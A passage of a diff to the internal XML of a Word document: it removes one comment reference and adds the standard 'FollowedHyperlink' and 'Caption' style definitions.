xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 w15 w16se w16cid w16 w16cex w16sdtdh w16sdtfl cr w16du wp14">
-  <w16cex:commentExtensible w16cex:durableId="760BFA7A" w16cex:dateUtc="2026-06-16T21:21:00Z"/>
   <w16cex:commentExtensible w16cex:durableId="5FA03D0A" w16cex:dateUtc="2026-06-20T01:12:00Z"/>
 </w16cex:commentsExtensible>
 </file>
 
 <file path=word/commentsIds.xml><?xml version="1.0" encoding="utf-8"?>
 <w16cid:commentsIds xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:cx="http://schemas.microsoft.com/office/drawing/2014/chartex" xmlns:cx1="http://schemas.microsoft.com/office/drawing/2015/9/8/chartex" xmlns:cx2="http://schemas.microsoft.com/office/drawing/2015/10/21/chartex" xmlns:cx3="http://schemas.microsoft.com/office/drawing/2016/5/9/chartex" xmlns:cx4="http://schemas.microsoft.com/office/drawing/2016/5/10/chartex" xmlns:cx5="http://schemas.microsoft.com/office/drawing/2016/5/11/chartex" xmlns:cx6="http://schemas.microsoft.com/office/drawing/2016/5/12/chartex" xmlns:cx7="http://schemas.microsoft.com/office/drawing/2016/5/13/chartex" xmlns:cx8="http://schemas.microsoft.com/office/drawing/2016/5/14/chartex" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:aink="http://schemas.microsoft.com/office/drawing/2016/ink" xmlns:am3d="http://schemas.microsoft.com/office/drawing/2017/model3d" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:oel="http://schemas.microsoft.com/office/2019/extlst" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16cex="http://schemas.microsoft.com/office/word/2018/wordml/cex" xmlns:w16cid="http://schemas.microsoft.com/office/word/2016/wordml/cid" xmlns:w16="http://schemas.microsoft.com/office/word/2018/wordml" xmlns:w16du="http://schemas.microsoft.com/office/word/2023/wordml/word16du" xmlns:w16sdtdh="http://schemas.microsoft.com/office/word/2020/wordml/sdtdatahash" xmlns:w16sdtfl="http://schemas.microsoft.com/office/word/2024/wordml/sdtformatlock" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 w15 w16se w16cid w16 w16cex w16sdtdh w16sdtfl w16du wp14">
-  <w16cid:commentId w16cid:paraId="021B784C" w16cid:durableId="760BFA7A"/>
   <w16cid:commentId w16cid:paraId="1A27AC78" w16cid:durableId="5FA03D0A"/>
 </w16cid:commentsIds>
 </file>
@@ -6300,6 +6643,37 @@
       <w:color w:val="666666"/>
     </w:rPr>
   </w:style>
+  <w:style w:type="character" w:styleId="FollowedHyperlink">
+    <w:name w:val="FollowedHyperlink"/>
+    <w:basedOn w:val="DefaultParagraphFont"/>
+    <w:uiPriority w:val="99"/>
+    <w:semiHidden/>
+    <w:unhideWhenUsed/>
+    <w:rsid w:val="001D4E4C"/>
+    <w:rPr>
+      <w:color w:val="96607D" w:themeColor="followedHyperlink"/>
+      <w:u w:val="single"/>
+    </w:rPr>
+  </w:style>
+  <w:style w:type="paragraph" w:styleId="Caption">
+    <w:name w:val="caption"/>
+    <w:basedOn w:val="Normal"/>
+    <w:next w:val="Normal"/>
+    <w:uiPriority w:val="35"/>
+    <w:unhideWhenUsed/>
+    <w:qFormat/>
+    <w:rsid w:val="005E24F1"/>
+    <w:pPr>
+      <w:spacing w:after="200" w:line="240" w:lineRule="auto"/>
+    </w:pPr>
+    <w:rPr>
+      <w:i/>
+      <w:iCs/>
+      <w:color w:val="0E2841" w:themeColor="text2"/>
+      <w:sz w:val="18"/>
+      <w:szCs w:val="18"/>
+    </w:rPr>
+  </w:style>
 </w:styles>
 </file>
 

</xml_diff>